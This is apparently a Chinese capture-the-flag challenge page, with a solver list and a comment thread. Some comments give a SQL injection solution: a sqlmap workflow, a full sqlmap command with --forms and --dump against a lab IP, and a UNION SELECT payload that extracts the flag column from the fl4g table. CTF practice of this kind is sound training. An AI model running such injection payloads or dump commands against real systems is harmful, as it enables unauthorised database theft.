评分(25)
解题动态
薄言. 攻破了该题 10小时前
yokoi 攻破了该题 11小时前
18785002668 攻破了该题 16小时前
kkctf 攻破了该题 1天前
fish12139 攻破了该题 1天前
Schen 攻破了该题 1天前
渐入佳境 攻破了该题 1天前
111119999 攻破了该题 1天前
少年,你的剑太重了 攻破了该题 2天前
店晓贰 攻破了该题 2天前
8831 攻破了该题 2天前
13822005976 攻破了该题 2天前
pkouki 攻破了该题 3天前
张云天 攻破了该题 3天前
yfy 攻破了该题 3天前
CQYXX 攻破了该题 3天前
众长生 攻破了该题 3天前
donk6 攻破了该题 3天前
.tang 攻破了该题 3天前
评论
hmlpzm 2天前
举报
kskbl
donk6 3天前
举报
胡俊胡俊杰你被捕了
jay cat 3天前
举报
熊金卫伤了你的小心脏?
jay cat 3天前
举报
都是同龄人,我原本没想降维打击
WWls= 4天前
举报
这么简单的注入题还有人用sqlmap别逗我笑了
jay cat 3天前
举报
豪到我了
298617 16天前
举报
qrb666
mzjjkk 16天前
举报
qrb999
诗意黎明 17天前
举报
哈吉米南北绿豆,哈哑鼓曼波
ljy1997 28天前
举报
说一下我的思路:1、随便输入1查询,发现会返回一个表格,怀疑有sql注入漏洞。 2、然后用kali自带的sqlmap工具,因为这个工具只能扫描.txt文件,所以先用bs抓包改post请求之后保存成txt文件。 3、sqlmap命令扫描,发现的确是sql注入漏洞。 4、结果里有一个ctf的数据库,肯定就在这儿了 5、接着扫描这个skctf发现里面有fl4g这个表。 6、接着扫描,出结果。
Galaxies2580 1月前
举报
为什么打不开靶机网址,显示无法访问
叶澜 3月前
举报
sqlmap -u "http://171.80.2.169:11993/" --forms -D skctf --dump
lovehhh 5月前
举报
1' and 1=2 union select group_concat(skctf_flag),2,3,4 from fl4g;#--